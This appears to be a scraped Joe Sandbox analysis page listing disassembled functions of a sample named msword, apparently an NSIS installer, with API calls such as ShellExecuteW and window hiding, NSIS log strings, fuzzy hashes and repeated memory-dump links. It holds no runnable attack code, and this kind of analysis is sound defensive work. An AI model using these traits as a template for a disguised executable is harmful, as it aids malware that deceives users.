Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
WarsFeltMadridFarmsPee, xrefs: 00402770
<RM>, xrefs: 00402713

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$WarsFeltMadridFarmsPee$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-1220653561
Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405E9D
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8

Strings

nsa, xrefs: 00405E8C

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D

Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85

Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89

Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86

Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85

Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86

Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86

Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNELBASE(?), ref: 004073C5
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
GlobalFree.KERNELBASE(?), ref: 0040743D
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: Global$AllocFree
String ID:
API String ID: 3394109436-0
Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E

Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
